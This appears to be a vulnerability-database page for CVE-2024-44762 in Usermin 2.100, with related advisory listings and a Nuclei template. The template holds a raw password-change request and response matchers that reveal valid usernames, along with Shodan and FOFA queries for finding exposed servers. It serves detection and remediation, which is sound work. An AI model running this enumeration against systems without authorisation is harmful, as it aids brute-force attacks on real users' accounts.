| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| Exploit for Generation of Error Message Containing Sensitive Information in Webmin Usermin | 27 Dec 202516:38 | – | githubexploit | |
| November Linux Patch Wednesday | 21 Nov 202516:21 | – | avleonov | |
| The vulnerability of the password_change.cgi web interface for Unix-like systems, Usermin, allows a perpetrator to execute an attack using brute-force methods. | 30 Oct 202400:00 | – | bdu_fstec | |
| CVE-2024-44762 | 16 Oct 202423:55 | – | circl | |
| Webmin Usermin 安全漏洞 | 16 Oct 202400:00 | – | cnnvd | |
| CVE-2024-44762 | 16 Oct 202400:00 | – | cve | |
| CVE-2024-44762 | 16 Oct 202400:00 | – | cvelist | |
| Webmin Usermin 2.100 - Username Enumeration | 3 Apr 202500:00 | – | exploitdb | |
| Usermin 2.100 - Username Enumeration | 17 Apr 202500:00 | – | exploitdb | |
| CVE-2024-44762 | 16 Oct 202421:15 | – | nvd |
| Source | Link |
|---|---|
| exploit-db | www.exploit-db.com/exploits/52254 |
| webmin | www.webmin.com/usermin.html |
| senscybersecurity | www.senscybersecurity.nl/cve-2024-44762-explained/ |
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2024-44762 |
id: CVE-2024-44762
info:
name: Usermin 2.100 - Username Enumeration
author: ritikchaddha
severity: medium
description: |
Usermin version 2.100 and below is susceptible to username enumeration via the password change functionality. An attacker can determine valid usernames by analyzing the response messages from the password change endpoint.
impact: |
Attackers can enumerate valid usernames by analyzing password change responses, aiding in further attacks.
remediation: |
Upgrade to the latest version of Usermin that addresses this vulnerability.
reference:
- https://www.exploit-db.com/exploits/52254
- https://www.webmin.com/usermin.html
- https://senscybersecurity.nl/cve-2024-44762-explained/
- https://nvd.nist.gov/vuln/detail/CVE-2024-44762
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-44762
cwe-id: CWE-209
epss-score: 0.02621
epss-percentile: 0.83611
metadata:
verified: true
max-request: 1
vendor: webmin
product: usermin
shodan-query: title:"Usermin"
fofa-query: app="Usermin"
tags: cve,cve2024,usermin,webmin,exposure,usernames,vuln
http:
- raw:
- |
POST /password_change.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/password_change.cgi
user=admin&pam=&expired=2&old=fakePassword&new1=password&new2=password
matchers:
- type: word
part: body
words:
- "Failed to change password: The current password is incorrect"
- "Your login name was not found in the password file"
condition: or
# digest: 490a0046304402201b814b81640f659ac6892b78f3f134fb1ed6260d87d5af993a0c5f4cef6df23202206f6376ed551c0821b96fea3a0560e22ef0c92000d935da5ed8294777b8cb16d2:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation